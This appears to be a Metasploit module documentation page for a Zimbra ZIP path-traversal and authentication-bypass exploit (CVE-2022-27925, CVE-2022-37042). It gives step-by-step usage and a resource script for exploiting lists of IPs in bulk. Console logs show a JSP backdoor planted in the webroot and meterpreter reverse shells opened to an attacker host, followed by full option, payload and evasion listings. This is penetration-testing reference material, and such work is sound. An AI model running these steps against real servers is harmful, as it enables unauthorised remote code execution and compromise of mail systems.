Zip Path Traversal in Zimbra (mboximport) (CVE-2022-27925) - Metasploit


This page contains detailed information about how to use the exploit/linux/http/zimbra_mboximport_cve_2022_27925 metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: Zip Path Traversal in Zimbra (mboximport) (CVE-2022-27925)
Module: exploit/linux/http/zimbra_mboximport_cve_2022_27925
Source code: modules/exploits/linux/http/zimbra_mboximport_cve_2022_27925.rb
Disclosure date: 2022-05-10
Last modification time: 2022-08-22 12:11:08 +0000
Supported architecture(s): x86, x64
Supported platform(s): Linux
Target service / protocol: http, https
Target network port(s): 80, 443, 3000, 7071, 8000, 8008, 8080, 8443, 8880, 8888
List of CVEs: CVE-2022-27925, CVE-2022-37042

This module POSTs a ZIP file containing path traversal characters to the administrator interface for Zimbra Collaboration Suite. If successful, it plants a JSP-based backdoor within the web directory, then executes it. The core vulnerability is a path-traversal issue in Zimbra Collaboration Suite's ZIP implementation that can result in the extraction of an arbitrary file to an arbitrary location on the host. This issue is exploitable on the following versions of Zimbra: * Zimbra Collaboration Suite Network Edition 9.0.0 Patch 23 (and earlier) * Zimbra Collaboration Suite Network Edition 8.8.15 Patch 30 (and earlier) Note that the Open Source Edition is not affected.

Module Ranking and Traits


Module Ranking:

  • excellent: The exploit will never crash the service. This is the case for SQL Injection, CMD execution, RFI, LFI, etc. No typical memory corruption exploits should be given this ranking unless there are extraordinary circumstances. More information about ranking can be found here.

Reliability:

  • repeatable-session: The module is expected to get a shell every time it runs.

Stability:

  • crash-safe: Module should not crash the service.

Side Effects:

  • ioc-in-logs: Module leaves signs of a compromise in a log file (Example: SQL injection data found in HTTP log).

Basic Usage


Using zimbra_mboximport_cve_2022_27925 against a single host

Normally, you can use exploit/linux/http/zimbra_mboximport_cve_2022_27925 this way:

msf > use exploit/linux/http/zimbra_mboximport_cve_2022_27925
msf exploit(zimbra_mboximport_cve_2022_27925) > show targets
    ... a list of targets ...
msf exploit(zimbra_mboximport_cve_2022_27925) > set TARGET target-id
msf exploit(zimbra_mboximport_cve_2022_27925) > show options
    ... show and set options ...
msf exploit(zimbra_mboximport_cve_2022_27925) > exploit

Using zimbra_mboximport_cve_2022_27925 against multiple hosts

But it looks like this is a remote exploit module, which means you can also engage multiple hosts.

First, create a list of IPs you wish to exploit with this module. One IP per line.

Second, set up a background payload listener. This payload should be the same as the one your zimbra_mboximport_cve_2022_27925 will be using:

  1. Do: use exploit/multi/handler
  2. Do: set PAYLOAD [payload]
  3. Set other options required by the payload
  4. Do: set EXITONSESSION false
  5. Do: run -j

At this point, you should have a payload listening.

Next, create the following script. Notice you will probably need to modify the ip_list path, and payload options accordingly:

<ruby>
#
# Modify the path if necessary
#
ip_list = '/tmp/ip_list.txt'

File.open(ip_list, 'rb').each_line do |ip|
  print_status("Trying against #{ip}")
  run_single("use exploit/linux/http/zimbra_mboximport_cve_2022_27925")
  run_single("set RHOST #{ip}")
  run_single("set DisablePayloadHandler true")

  #
  # Set a payload that's the same as the handler.
  # You might also need to add more run_single commands to configure other
  # payload options.
  #
  run_single("set PAYLOAD [payload name]")

  run_single("run")
end
</ruby>

Next, run the resource script in the console:

msf > resource [path-to-resource-script]

And finally, you should see that the exploit is trying against those hosts similar to the following MS08-067 example:

msf > resource /tmp/exploit_hosts.rc
[*] Processing /tmp/exploit_hosts.rc for ERB directives.
[*] resource (/tmp/exploit_hosts.rc)> Ruby Code (402 bytes)
[*] Trying against 192.168.1.80

RHOST => 192.168.1.80
DisablePayloadHandler => true
PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 192.168.1.199

[*] 192.168.1.80:445 - Automatically detecting the target...
[*] 192.168.1.80:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] 192.168.1.80:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] 192.168.1.80:445 - Attempting to trigger the vulnerability...
[*] Sending stage (957999 bytes) to 192.168.1.80
[*] Trying against 192.168.1.109
RHOST => 192.168.1.109
DisablePayloadHandler => true
PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 192.168.1.199
[*] 192.168.1.109:445 - Automatically detecting the target...
[*] 192.168.1.109:445 - Fingerprint: Windows 2003 - Service Pack 2 - lang:Unknown
[*] 192.168.1.109:445 - We could not detect the language pack, defaulting to English
[*] 192.168.1.109:445 - Selected Target: Windows 2003 SP2 English (NX)
[*] 192.168.1.109:445 - Attempting to trigger the vulnerability...
[*] Meterpreter session 1 opened (192.168.1.199:4444 -> 192.168.1.80:1071) at 2016-03-02 19:32:49 -0600

[*] Sending stage (957999 bytes) to 192.168.1.109
[*] Meterpreter session 2 opened (192.168.1.199:4444 -> 192.168.1.109:4626) at 2016-03-02 19:32:52 -0600

Required Options


  • RHOSTS: The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit

  • TARGET_PATH: The location the payload should extract to (can, and should, contain path traversal characters - "../../").

Knowledge Base


Vulnerable Application


This module exploits a path-traversal vulnerability as well as an authentication-bypass vulnerability in the following versions of Zimbra Collaboration Suite:

  • Zimbra Collaboration Suite Network Edition 9.0.0 Patch 23 (and earlier)
  • Zimbra Collaboration Suite Network Edition 8.8.15 Patch 30 (and earlier)

Note that the open source edition is not affected.

Successful exploitation results in RCE as the zimbra user.

Installing the vulnerable versions of Zimbra is a pain, unfortunately. I used a trial version of ZCS 8.8.12, which you can currently get here. On the download page, after you register with a valid email address, there's an "older versions" link where you can get vulnerable versions.

To set the server up: 1. wget https://files.zimbra.com/downloads/8.8.12_GA/zcs-NETWORK-8.8.12_GA_3794.UBUNTU18_64.20190329045002.tgz on a Ubuntu 18.04 VM. 1. tar -xvf zcs-NETWORK-8.8.12_GA_3794.UBUNTU18_64.20190329045002.tgz 1. hostnamectl set-hostname <hostname of your choice> to set the hostname for the VM. 1. Edit the /etc/hosts file and add in a line 127.0.0.1 <hostname of your choice> 1. cd zcs-NETWORK-8.8.12_GA_3794.UBUNTU18_64.20190329045002 && sudo ./setup.sh 1. Answer Y to every question. 1. You will need to wait a while whilst some stuff is set up. You should then get to a menu. 1. Use the number keys to select the menu options. 1. Configure the rest of the options such as the admin password, and full path to license file. 1. Once everything is configured you should get a prompt to press a to save and install. Press a when this appears. 1. You will then be prompted to save the configuration. Accept this and respond Y to any further prompts. 1. Server should start installing. Once its finished you should be ready to test.

Once the server is up, it's vulnerable.

msf6 > use exploit/linux/http/zimbra_mboximport_cve_2022_27925
[*] Using configured payload linux/x64/meterpreter/reverse_tcp
msf6 exploit(linux/http/zimbra_mboximport_cve_2022_27925) > set RHOSTS 10.0.0.166
RHOSTS => 10.0.0.166
msf6 exploit(linux/http/zimbra_mboximport_cve_2022_27925) > set LHOST 10.0.0.146
LHOST => 10.0.0.146
msf6 exploit(linux/http/zimbra_mboximport_cve_2022_27925) > exploit

[*] Started reverse TCP handler on 10.0.0.146:4444
[*] Encoding the payload as a .jsp file
[*] Target filename: ../../../../../../../../../../../../opt/zimbra/jetty_base/webapps/zimbra/public/wuuvqmtko.jsp
[*] Sending POST request with ZIP file
[*] Trying to trigger the backdoor @ public/wuuvqmtko.jsp
[*] Sending stage (3020772 bytes) to 10.0.0.166
[+] Successfully triggered the payload
[+] Deleted ../../../../../../../../../../../../opt/zimbra/jetty_base/webapps/zimbra/public/wuuvqmtko.jsp
[*] Meterpreter session 1 opened (10.0.0.146:4444 -> 10.0.0.166:35180) at 2022-08-19 11:06:38 -0700

There's no easy way that I see to check for the patch (and the only vulnerable version I have is quite a bit older), so attempts to exploit patched versions will likely result in a warning message that the target may not vulnerable:

msf6 exploit(linux/http/zimbra_mboximport_cve_2022_27925) > exploit

[*] Started reverse TCP handler on 10.0.0.146:4444
[*] Encoding the payload as a .jsp file
[*] Target filename: ../../../../../../../../../../../../opt/zimbra/jetty_base/webapps/zimbra/public/gauca.jsp
[*] Sending POST request with ZIP file
[*] Trying to trigger the backdoor @ public/gauca.jsp
[-] Exploit aborted due to failure: unknown: Payload was not uploaded, the server probably isn't vulnerable
[!] This exploit may require manual cleanup of '../../../../../../../../../../../../opt/zimbra/jetty_base/webapps/zimbra/public/gauca.jsp' on the target
[*] Exploit completed, but no session was created.

Verification Steps


  1. use exploit/linux/http/zimbra_mboximport_cve_2022_27925
  2. set RHOSTS <TARGET HOSTS>
  3. set LHOST <Address of Attacking Machine>
  4. exploit
  5. You should get a shell as the zimbra user.

Options


TARGET_PATH

The path (traversal included) where the payload will extract to. The default is the webroot, which is usually pretty safe.

TARGET_FILENAME

The actual filename. It really should end with .jsp, otherwise it won't execute.

By default, it's a random string with .jsp on the end. That should work fine, especially because we can't overwrite files and don't want to use the same payload name more than once.

TARGET_USERNAME

The username included in the mboximport request - any valid username works, admin is usually fine.

Scenarios


Zimbra Collaboration Suite Network Edition 8.8.12 Patch 6 on Ubuntu 18.04

msf6 > use exploit/linux/http/zimbra_mboximport_cve_2022_27925
[*] Using configured payload linux/x64/meterpreter/reverse_tcp
msf6 exploit(linux/http/zimbra_mboximport_cve_2022_27925) > set RHOSTS 10.0.0.166
RHOSTS => 10.0.0.166
msf6 exploit(linux/http/zimbra_mboximport_cve_2022_27925) > set LHOST 10.0.0.146
LHOST => 10.0.0.146
msf6 exploit(linux/http/zimbra_mboximport_cve_2022_27925) > show options

Module options (exploit/linux/http/zimbra_mboximport_cve_2022_27925):

   Name             Current Setting                                                                   Required  Description
   ----             ---------------                                                                   --------  -----------
   Proxies                                                                                            no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS           10.0.0.166                                                                        yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT            7071                                                                              yes       The target port (TCP)
   SSL              true                                                                              no        Negotiate SSL/TLS for outgoing connections
   TARGET_FILENAME                                                                                    no        The filename to write in the target directory; should have a .jsp extension (default: <random>.jsp).
   TARGET_PATH      ../../../../../../../../../../../../opt/zimbra/jetty_base/webapps/zimbra/public/  yes       The location the payload should extract to (can, and should, contain path traversal characters - "../../").
   TARGET_USERNAME  admin                                                                             yes       The target user, must be valid on the Zimbra server
   VHOST                                                                                              no        HTTP server virtual host


Payload options (linux/x64/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.0.0.146       yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Zimbra Collaboration Suite

msf6 exploit(linux/http/zimbra_mboximport_cve_2022_27925) > exploit

[*] Started reverse TCP handler on 10.0.0.146:4444 
[*] Encoding the payload as a .jsp file
[*] Target filename: ../../../../../../../../../../../../opt/zimbra/jetty_base/webapps/zimbra/public/nkxj.jsp
[*] Sending POST request with ZIP file
[*] Trying to trigger the backdoor @ public/nkxj.jsp
[*] Sending stage (3020772 bytes) to 10.0.0.166
[+] Successfully triggered the payload
[+] Deleted ../../../../../../../../../../../../opt/zimbra/jetty_base/webapps/zimbra/public/nkxj.jsp
[*] Meterpreter session 1 opened (10.0.0.146:4444 -> 10.0.0.166:48640) at 2022-08-22 11:08:19 -0700

meterpreter > getuid
Server username: zimbra

meterpreter > shell
Process 121849 created.
Channel 1 created.
/opt/zimbra/bin/zmcontrol -v
Release 8.8.12.GA.3794.UBUNTU18.64 UBUNTU18_64 NETWORK edition, Patch 8.8.12_P6.

Zimbra Collaboration Suite Network Edition 8.8.15 Patch 33 on Ubuntu 18.04

Note: This version is not vulnerable, because the issue is patched

msf6 > use exploit/linux/http/zimbra_mboximport_cve_2022_27925
[*] Using configured payload linux/x64/meterpreter/reverse_tcp
msf6 exploit(linux/http/zimbra_mboximport_cve_2022_27925) > set RHOSTS 10.0.0.167
RHOSTS => 10.0.0.167
msf6 exploit(linux/http/zimbra_mboximport_cve_2022_27925) > set LHOST 10.0.0.146
LHOST => 10.0.0.146
msf6 exploit(linux/http/zimbra_mboximport_cve_2022_27925) > exploit

[*] Started reverse TCP handler on 10.0.0.146:4444
[*] Encoding the payload as a .jsp file
[*] Target filename: ../../../../../../../../../../../../opt/zimbra/jetty_base/webapps/zimbra/public/gauca.jsp
[*] Sending POST request with ZIP file
[*] Trying to trigger the backdoor @ public/gauca.jsp
[-] Exploit aborted due to failure: unknown: Payload was not uploaded, the server probably isn't vulnerable
[!] This exploit may require manual cleanup of '../../../../../../../../../../../../opt/zimbra/jetty_base/webapps/zimbra/public/gauca.jsp' on the target
[*] Exploit completed, but no session was created.

Zimbra Collaboration Suite Open Source Edition Patch 8.8.12 Patch 6 on Ubuntu 18.04

Note: This version is not vulnerable, the open source edition doesn't have the correct path.

msf6 > use exploit/linux/http/zimbra_mboximport_cve_2022_27925
[*] Using configured payload linux/x64/meterpreter/reverse_tcp
msf6 exploit(linux/http/zimbra_mboximport_cve_2022_27925) > set RHOSTS 10.0.0.164
RHOSTS => 10.0.0.164
msf6 exploit(linux/http/zimbra_mboximport_cve_2022_27925) > set LHOST 10.0.0.146
LHOST => 10.0.0.146
msf6 exploit(linux/http/zimbra_mboximport_cve_2022_27925) > exploit

[*] Started reverse TCP handler on 10.0.0.146:4444 
[*] Encoding the payload as a .jsp file
[*] Target filename: ../../../../../../../../../../../../opt/zimbra/jetty_base/webapps/zimbra/public/cualvccyq.jsp
[*] Sending POST request with ZIP file
[-] Exploit aborted due to failure: not-found: The target path was not found, target is probably not vulnerable
[*] Exploit completed, but no session was created.

Go back to menu.

Msfconsole Usage


Here is how the linux/http/zimbra_mboximport_cve_2022_27925 exploit module looks in the msfconsole:

msf6 > use exploit/linux/http/zimbra_mboximport_cve_2022_27925

[*] Using configured payload linux/x64/meterpreter/reverse_tcp
msf6 exploit(linux/http/zimbra_mboximport_cve_2022_27925) > show info

       Name: Zip Path Traversal in Zimbra (mboximport) (CVE-2022-27925)
     Module: exploit/linux/http/zimbra_mboximport_cve_2022_27925
   Platform: Linux
       Arch: x86, x64
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2022-05-10

Provided by:
  Volexity Threat Research
  Yang_99's Nest
  Ron Bowes

Module side effects:
 ioc-in-logs

Module stability:
 crash-safe

Module reliability:
 repeatable-session

Available targets:
  Id  Name
  --  ----
  0   Zimbra Collaboration Suite

Check supported:
  No

Basic options:
  Name             Current Setting                           Required  Description
  ----             ---------------                           --------  -----------
  Proxies                                                    no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS                                                     yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wik
                                                                       i/Using-Metasploit
  RPORT            7071                                      yes       The target port (TCP)
  SSL              true                                      no        Negotiate SSL/TLS for outgoing connections
  TARGET_FILENAME                                            no        The filename to write in the target directory; should have a .jsp extensio
                                                                       n (default: <random>.jsp).
  TARGET_PATH      ../../../../../../../../../../../../opt/  yes       The location the payload should extract to (can, and should, contain path
                   zimbra/jetty_base/webapps/zimbraAdmin/pu            traversal characters - "../../").
                   blic/
  TARGET_USERNAME  admin                                     yes       The target user, must be valid on the Zimbra server
  VHOST                                                      no        HTTP server virtual host

Payload information:

Description:
  This module POSTs a ZIP file containing path traversal characters to 
  the administrator interface for Zimbra Collaboration Suite. If 
  successful, it plants a JSP-based backdoor within the web directory, 
  then executes it. The core vulnerability is a path-traversal issue 
  in Zimbra Collaboration Suite's ZIP implementation that can result 
  in the extraction of an arbitrary file to an arbitrary location on 
  the host. This issue is exploitable on the following versions of 
  Zimbra: * Zimbra Collaboration Suite Network Edition 9.0.0 Patch 23 
  (and earlier) * Zimbra Collaboration Suite Network Edition 8.8.15 
  Patch 30 (and earlier) Note that the Open Source Edition is not 
  affected.

References:
  https://nvd.nist.gov/vuln/detail/CVE-2022-27925
  https://nvd.nist.gov/vuln/detail/CVE-2022-37042
  https://blog.zimbra.com/2022/03/new-zimbra-patches-9-0-0-patch-24-and-8-8-15-patch-31/
  https://www.cisa.gov/uscert/ncas/alerts/aa22-228a
  https://www.yang99.top/index.php/archives/82/
  https://wiki.zimbra.com/wiki/Zimbra_Releases/9.0.0/P24
  https://wiki.zimbra.com/wiki/Zimbra_Releases/8.8.15/P31

Module Options


This is a complete list of options available in the linux/http/zimbra_mboximport_cve_2022_27925 exploit:

msf6 exploit(linux/http/zimbra_mboximport_cve_2022_27925) > show options

Module options (exploit/linux/http/zimbra_mboximport_cve_2022_27925):

   Name             Current Setting                           Required  Description
   ----             ---------------                           --------  -----------
   Proxies                                                    no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                                                     yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wi
                                                                        ki/Using-Metasploit
   RPORT            7071                                      yes       The target port (TCP)
   SSL              true                                      no        Negotiate SSL/TLS for outgoing connections
   TARGET_FILENAME                                            no        The filename to write in the target directory; should have a .jsp extensi
                                                                        on (default: <random>.jsp).
   TARGET_PATH      ../../../../../../../../../../../../opt/  yes       The location the payload should extract to (can, and should, contain path
                    zimbra/jetty_base/webapps/zimbraAdmin/pu             traversal characters - "../../").
                    blic/
   TARGET_USERNAME  admin                                     yes       The target user, must be valid on the Zimbra server
   VHOST                                                      no        HTTP server virtual host

Payload options (linux/x64/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Zimbra Collaboration Suite

Advanced Options


Here is a complete list of advanced options supported by the linux/http/zimbra_mboximport_cve_2022_27925 exploit:

msf6 exploit(linux/http/zimbra_mboximport_cve_2022_27925) > show advanced

Module advanced options (exploit/linux/http/zimbra_mboximport_cve_2022_27925):

   Name                     Current Setting                        Required  Description
   ----                     ---------------                        --------  -----------
   AllowNoCleanup           false                                  no        Allow exploitation without the possibility of cleaning up files
   ContextInformationFile                                          no        The information file that contains context information
   DOMAIN                   WORKSTATION                            yes       The domain to use for Windows authentication
   DigestAuthIIS            true                                   no        Conform to IIS, should work for most servers. Only set to false for
                                                                             non-IIS servers
   DisablePayloadHandler    false                                  no        Disable the handler code for the selected payload
   EXE::Custom                                                     no        Use custom exe instead of automatically generating a payload exe
   EXE::EICAR               false                                  no        Generate an EICAR file instead of regular payload exe
   EXE::FallBack            false                                  no        Use the default template in case the specified one is missing
   EXE::Inject              false                                  no        Set to preserve the original EXE function
   EXE::OldMethod           false                                  no        Set to use the substitution EXE generation method.
   EXE::Path                                                       no        The directory in which to look for the executable template
   EXE::Template                                                   no        The executable template file name.
   EnableContextEncoding    false                                  no        Use transient context when encoding payloads
   FileDropperDelay                                                no        Delay in seconds before attempting cleanup
   FingerprintCheck         true                                   no        Conduct a pre-exploit fingerprint verification
   HttpClientTimeout                                               no        HTTP connection and receive timeout
   HttpPassword                                                    no        The HTTP password to specify for authentication
   HttpRawHeaders                                                  no        Path to ERB-templatized raw headers to append to existing headers
   HttpTrace                false                                  no        Show the raw HTTP requests and responses
   HttpTraceColors          red/blu                                no        HTTP request and response colors for HttpTrace (unset to disable)
   HttpTraceHeadersOnly     false                                  no        Show HTTP headers only in HttpTrace
   HttpUsername                                                    no        The HTTP username to specify for authentication
   MSI::Custom                                                     no        Use custom msi instead of automatically generating a payload msi
   MSI::EICAR               false                                  no        Generate an EICAR file instead of regular payload msi
   MSI::Path                                                       no        The directory in which to look for the msi template
   MSI::Template                                                   no        The msi template file name
   MSI::UAC                 false                                  no        Create an MSI with a UAC prompt (elevation to SYSTEM if accepted)
   SSLServerNameIndication                                         no        SSL/TLS Server Name Indication (SNI)
   SSLVersion               Auto                                   yes       Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are a
                                                                             uto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1
                                                                             .2)
   UserAgent                Mozilla/5.0 (Macintosh; Intel Mac OS   no        The User-Agent header to use for all requests
                            X 12.2; rv:97.0) Gecko/20100101 Firef
                            ox/97.0
   VERBOSE                  false                                  no        Enable detailed status messages
   WORKSPACE                                                       no        Specify the workspace for this module
   WfsDelay                 2                                      no        Additional delay in seconds to wait for a session

Payload advanced options (linux/x64/meterpreter/reverse_tcp):

   Name                         Current Setting  Required  Description
   ----                         ---------------  --------  -----------
   AppendExit                   false            no        Append a stub that executes the exit(0) system call
   AutoLoadStdapi               true             yes       Automatically load the Stdapi extension
   AutoRunScript                                 no        A script to run automatically on session creation.
   AutoSystemInfo               true             yes       Automatically capture system information on initialization.
   AutoUnhookProcess            false            yes       Automatically load the unhook extension and unhook the process
   AutoVerifySessionTimeout     30               no        Timeout period to wait for session validation to occur, in seconds
   EnableStageEncoding          false            no        Encode the second stage payload
   EnableUnicodeEncoding        false            yes       Automatically encode UTF-8 strings as hexadecimal
   HandlerSSLCert                                no        Path to a SSL certificate in unified PEM format, ignored for HTTP transports
   InitialAutoRunScript                          no        An initial script to run on session creation (before AutoRunScript)
   MeterpreterDebugBuild        false            no        Use a debug version of Meterpreter
   MeterpreterDebugLogging                       no        The Meterpreter debug logging configuration, see https://github.com/rapid7/metasploit-
                                                           framework/wiki/Meterpreter-Debugging-Meterpreter-Sessions
   MeterpreterTryToFork         false            no        Fork a new process if the functionality is available
   PayloadProcessCommandLine                     no        The displayed command line that will be used by the payload
   PayloadUUIDName                               no        A human-friendly name to reference this unique payload (requires tracking)
   PayloadUUIDRaw                                no        A hex string representing the raw 8-byte PUID value for the UUID
   PayloadUUIDSeed                               no        A string to use when generating the payload UUID (deterministic)
   PayloadUUIDTracking          false            yes       Whether or not to automatically register generated UUIDs
   PingbackRetries              0                yes       How many additional successful pingbacks
   PingbackSleep                30               yes       Time (in seconds) to sleep between pingbacks
   PrependChrootBreak           false            no        Prepend a stub that will break out of a chroot (includes setreuid to root)
   PrependFork                  false            no        Prepend a stub that starts the payload in its own process via fork
   PrependSetgid                false            no        Prepend a stub that executes the setgid(0) system call
   PrependSetregid              false            no        Prepend a stub that executes the setregid(0, 0) system call
   PrependSetresgid             false            no        Prepend a stub that executes the setresgid(0, 0, 0) system call
   PrependSetresuid             false            no        Prepend a stub that executes the setresuid(0, 0, 0) system call
   PrependSetreuid              false            no        Prepend a stub that executes the setreuid(0, 0) system call
   PrependSetuid                false            no        Prepend a stub that executes the setuid(0) system call
   ReverseAllowProxy            false            yes       Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy
                                                           but directly to LHOST
   ReverseListenerBindAddress                    no        The specific IP address to bind to on the local system
   ReverseListenerBindPort                       no        The port to bind to on the local system if different from LPORT
   ReverseListenerComm                           no        The specific communication channel to use for this listener
   ReverseListenerThreaded      false            yes       Handle every connection in a new thread (experimental)
   SessionCommunicationTimeout  300              no        The number of seconds of no activity before this session should be killed
   SessionExpirationTimeout     604800           no        The number of seconds before this session should be forcibly shut down
   SessionRetryTotal            3600             no        Number of seconds try reconnecting for on network failure
   SessionRetryWait             10               no        Number of seconds to wait between reconnect attempts
   StageEncoder                                  no        Encoder to use if EnableStageEncoding is set
   StageEncoderSaveRegisters                     no        Additional registers to preserve in the staged payload if EnableStageEncoding is set
   StageEncodingFallback        true             no        Fallback to no encoding if the selected StageEncoder is not compatible
   StagerRetryCount             10               no        The number of times the stager should retry if the first connect fails
   StagerRetryWait              5                no        Number of seconds to wait for the stager between reconnect attempts
   VERBOSE                      false            no        Enable detailed status messages
   WORKSPACE                                     no        Specify the workspace for this module

Exploit Targets


Here is a list of targets (platforms and systems) which the linux/http/zimbra_mboximport_cve_2022_27925 module can exploit:

msf6 exploit(linux/http/zimbra_mboximport_cve_2022_27925) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Zimbra Collaboration Suite

Compatible Payloads


This is a list of possible payloads which can be delivered and executed on the target system using the linux/http/zimbra_mboximport_cve_2022_27925 exploit:

msf6 exploit(linux/http/zimbra_mboximport_cve_2022_27925) > show payloads

Compatible Payloads
===================

   #   Name                                              Disclosure Date  Rank    Check  Description
   -   ----                                              ---------------  ----    -----  -----------
   0   payload/generic/custom                                             normal  No     Custom Payload
   1   payload/generic/debug_trap                                         normal  No     Generic x86 Debug Trap
   2   payload/generic/shell_bind_tcp                                     normal  No     Generic Command Shell, Bind TCP Inline
   3   payload/generic/shell_reverse_tcp                                  normal  No     Generic Command Shell, Reverse TCP Inline
   4   payload/generic/ssh/interact                                       normal  No     Interact with Established SSH Connection
   5   payload/generic/tight_loop                                         normal  No     Generic x86 Tight Loop
   6   payload/linux/x64/exec                                             normal  No     Linux Execute Command
   7   payload/linux/x64/meterpreter/bind_tcp                             normal  No     Linux Mettle x64, Bind TCP Stager
   8   payload/linux/x64/meterpreter/reverse_tcp                          normal  No     Linux Mettle x64, Reverse TCP Stager
   9   payload/linux/x64/meterpreter_reverse_http                         normal  No     Linux Meterpreter, Reverse HTTP Inline
   10  payload/linux/x64/meterpreter_reverse_https                        normal  No     Linux Meterpreter, Reverse HTTPS Inline
   11  payload/linux/x64/meterpreter_reverse_tcp                          normal  No     Linux Meterpreter, Reverse TCP Inline
   12  payload/linux/x64/pingback_bind_tcp                                normal  No     Linux x64 Pingback, Bind TCP Inline
   13  payload/linux/x64/pingback_reverse_tcp                             normal  No     Linux x64 Pingback, Reverse TCP Inline
   14  payload/linux/x64/shell/bind_tcp                                   normal  No     Linux Command Shell, Bind TCP Stager
   15  payload/linux/x64/shell/reverse_tcp                                normal  No     Linux Command Shell, Reverse TCP Stager
   16  payload/linux/x64/shell_bind_ipv6_tcp                              normal  No     Linux x64 Command Shell, Bind TCP Inline (IPv6)
   17  payload/linux/x64/shell_bind_tcp                                   normal  No     Linux Command Shell, Bind TCP Inline
   18  payload/linux/x64/shell_bind_tcp_random_port                       normal  No     Linux Command Shell, Bind TCP Random Port Inline
   19  payload/linux/x64/shell_reverse_ipv6_tcp                           normal  No     Linux x64 Command Shell, Reverse TCP Inline (IPv6)
   20  payload/linux/x64/shell_reverse_tcp                                normal  No     Linux Command Shell, Reverse TCP Inline
   21  payload/linux/x86/chmod                                            normal  No     Linux Chmod
   22  payload/linux/x86/exec                                             normal  No     Linux Execute Command
   23  payload/linux/x86/meterpreter/bind_ipv6_tcp                        normal  No     Linux Mettle x86, Bind IPv6 TCP Stager (Linux x86)
   24  payload/linux/x86/meterpreter/bind_ipv6_tcp_uuid                   normal  No     Linux Mettle x86, Bind IPv6 TCP Stager with UUID Support (Linux x86)
   25  payload/linux/x86/meterpreter/bind_nonx_tcp                        normal  No     Linux Mettle x86, Bind TCP Stager
   26  payload/linux/x86/meterpreter/bind_tcp                             normal  No     Linux Mettle x86, Bind TCP Stager (Linux x86)
   27  payload/linux/x86/meterpreter/bind_tcp_uuid                        normal  No     Linux Mettle x86, Bind TCP Stager with UUID Support (Linux x86)
   28  payload/linux/x86/meterpreter/reverse_ipv6_tcp                     normal  No     Linux Mettle x86, Reverse TCP Stager (IPv6)
   29  payload/linux/x86/meterpreter/reverse_nonx_tcp                     normal  No     Linux Mettle x86, Reverse TCP Stager
   30  payload/linux/x86/meterpreter/reverse_tcp                          normal  No     Linux Mettle x86, Reverse TCP Stager
   31  payload/linux/x86/meterpreter/reverse_tcp_uuid                     normal  No     Linux Mettle x86, Reverse TCP Stager
   32  payload/linux/x86/meterpreter_reverse_http                         normal  No     Linux Meterpreter, Reverse HTTP Inline
   33  payload/linux/x86/meterpreter_reverse_https                        normal  No     Linux Meterpreter, Reverse HTTPS Inline
   34  payload/linux/x86/meterpreter_reverse_tcp                          normal  No     Linux Meterpreter, Reverse TCP Inline
   35  payload/linux/x86/metsvc_bind_tcp                                  normal  No     Linux Meterpreter Service, Bind TCP
   36  payload/linux/x86/metsvc_reverse_tcp                               normal  No     Linux Meterpreter Service, Reverse TCP Inline
   37  payload/linux/x86/read_file                                        normal  No     Linux Read File
   38  payload/linux/x86/shell/bind_ipv6_tcp                              normal  No     Linux Command Shell, Bind IPv6 TCP Stager (Linux x86)
   39  payload/linux/x86/shell/bind_ipv6_tcp_uuid                         normal  No     Linux Command Shell, Bind IPv6 TCP Stager with UUID Support (Linux x86)
   40  payload/linux/x86/shell/bind_nonx_tcp                              normal  No     Linux Command Shell, Bind TCP Stager
   41  payload/linux/x86/shell/bind_tcp                                   normal  No     Linux Command Shell, Bind TCP Stager (Linux x86)
   42  payload/linux/x86/shell/bind_tcp_uuid                              normal  No     Linux Command Shell, Bind TCP Stager with UUID Support (Linux x86)
   43  payload/linux/x86/shell/reverse_ipv6_tcp                           normal  No     Linux Command Shell, Reverse TCP Stager (IPv6)
   44  payload/linux/x86/shell/reverse_nonx_tcp                           normal  No     Linux Command Shell, Reverse TCP Stager
   45  payload/linux/x86/shell/reverse_tcp                                normal  No     Linux Command Shell, Reverse TCP Stager
   46  payload/linux/x86/shell/reverse_tcp_uuid                           normal  No     Linux Command Shell, Reverse TCP Stager
   47  payload/linux/x86/shell_bind_ipv6_tcp                              normal  No     Linux Command Shell, Bind TCP Inline (IPv6)
   48  payload/linux/x86/shell_bind_tcp                                   normal  No     Linux Command Shell, Bind TCP Inline
   49  payload/linux/x86/shell_bind_tcp_random_port                       normal  No     Linux Command Shell, Bind TCP Random Port Inline
   50  payload/linux/x86/shell_reverse_tcp                                normal  No     Linux Command Shell, Reverse TCP Inline
   51  payload/linux/x86/shell_reverse_tcp_ipv6                           normal  No     Linux Command Shell, Reverse TCP Inline (IPv6)

Evasion Options


Here is the full list of possible evasion options supported by the linux/http/zimbra_mboximport_cve_2022_27925 exploit in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 exploit(linux/http/zimbra_mboximport_cve_2022_27925) > show evasion

Module evasion options:

   Name                          Current Setting  Required  Description
   ----                          ---------------  --------  -----------
   HTTP::header_folding          false            no        Enable folding of HTTP headers
   HTTP::method_random_case      false            no        Use random casing for the HTTP method
   HTTP::method_random_invalid   false            no        Use a random invalid, HTTP method for request
